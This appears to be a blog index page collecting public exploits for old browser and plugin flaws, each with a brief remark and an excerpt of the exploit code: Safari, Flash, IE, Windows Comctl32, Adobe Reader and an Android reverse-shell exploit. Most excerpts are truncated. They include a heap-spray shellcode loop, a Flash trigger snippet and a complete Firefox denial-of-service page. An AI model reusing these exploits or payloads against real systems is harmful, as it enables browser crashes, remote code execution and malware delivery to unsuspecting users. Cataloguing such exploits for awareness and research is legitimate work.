[Category:] Vulnerability

Safari 5.0.5 SVG Remote Code Execution Exploit (DEP bypass)

Recording this because it could also be used for malware distribution. http://www.exploit-db.com/exploits/17575/
<html> <head> <script> /* Abysssec Public Advisory apple killed one of our 0day no point to keep it private anymore :( there is another version of exploit using POPup and thats more reliable but as you know safari block pop up by default so we found a …

Adobe Flash Player 0-day Exploit (CVE-2011-0611)

The following code is reported to appear in SWF files related to the CVE-2011-0611 vulnerability.
Date.prototype.c_fun = SharedObject.prototype.getSize; Date.prototype.getDay = function () { this.c_fun(); }; var eval(0) = new Date(1.41466385537348e-315); (eval(0)).getDay(); Date.prototype.getDay = SharedObject.prototype.getSize; var d = new Date(8.30830068348057E-246); var __callResult_19 = d.getDay();

Windows Common Control Library (Comctl32) Heap Overflow (MS10-081, CVE-2010-2746)

#!/usr/bin/env ruby # http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept # Nephi Johnson require 'socket' def http_send(sock, data, opts={}) defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"} opts = defaults.merge(opts) code = opts[:code] message = opts[:message] type = opts[:type] date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT") headers = "HTTP/1.1 #{code} #{message}\r\n" + "Date: #{date_str}\r\n" + "Content-Length: #{data.length}\r\n" + "Content-Type: #{type}\r\n\r\n" puts "[+] …

Internet Explorer Uninitialized Memory Corruption Vulnerability (MS09-002, CVE-2009-0075)

<SCRIPT LANGUAGE="JavaScript"> <!-- Hide function killErrors() { return true; } window.onerror = killErrors; // --> </SCRIPT> <script language="JavaScript"> var aaa4='생략'; var aa4=(aaa4.replace(/MV/g,"%u")); var shellcode=unescape(aa4); var array = new Array(); var calc = 0x100000-(shellcode.length*2+0x01020); var point = unescape("%u0D0D%u0D0D"); while(point.length<calc) { point+=point;} var sec = point.substring(0,calc/2); delete point; for(i=0; i<0xD0; i++) { array[i] = sec + shellcode; …

Internet Explorer 8 CSS Parser Exploit – (CVE-2010-3971, MS11-003)

A vulnerability affecting Internet Explorer 8 has been published, so I am recording it here. http://www.exploit-db.com/exploits/15746/
#!/usr/bin/env ruby # Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/ # Author: Nephi Johnson (d0c_s4vage) require 'socket' def http_send(sock, data, opts={}) defaults = {:code=>"200", :message=>"OK", :type=>"text/html"} opts = defaults.merge(opts) code = opts[:code] message = opts[:message] type = opts[:type] to_send = "HTTP/1.1 #{code} #{message}\r\n" + "Date: Sat, 11 Dec 2010 14:20:23 …

Mozilla Firefox <= 3.6.12 Remote Denial Of Service

Firefox vulnerabilities have been appearing frequently lately.. unsettling -_- Source: http://www.exploit-db.com/exploits/15498/
<!-- 0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service Credits: Emanuele 'emgent' Gentili <[email protected]> Marco 'white_sheep' Rondini <[email protected]> Alessandro 'scox' Scoscia <[email protected]> --> <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write("a"); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script>

Summary of Adobe Reader Vulnerabilities

Countless Adobe-related vulnerabilities have poured out and keep coming. A summary seemed necessary, so I am collecting them here. I will keep adding whatever is missing; for now, just these...... They say Reader will move to a Sandbox model later, but will it really?
util.printf – CVE-2008-2992 Adobe Reader Javascript Printf Buffer Overflow Exploit =========================================================== Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow CVE-2008-2992 Thanks to coresecurity for the technical background. 6Nov,2008: Exploit released by me Credits: Debasis Mohanty …

Android 2.0-2.1 Reverse Shell Exploit – CVE-2010-1807

A remotely exploitable vulnerability has been confirmed on Android.. Leaving it here for the record. Source: http://www.exploit-db.com/exploits/15423/, http://www.exploit-db.com/exploits/15548/
<html> <head> <script> // bug = webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807 // listed as a safari bug but also works on android :) //tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 – 2.1 //patched= android 2.2 //author = mj …

Internet Explorer Memory Corruption 0day Vulnerability – CVE-2010-3962, MS10-090

Another Internet Explorer vulnerability has come out. Recording it because it could be used for malware distribution. Source: http://www.exploit-db.com/exploits/15421/
# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962 # Tested on Windows XP SP3 IE6 IE7 IE8 # Coded by Matteo Memelli ryujin __at__ offsec.com # http://www.offensive-security.com/0day/ie-0day.txt # Thx to dookie __at__ offsec.com # notes : This is a quick and …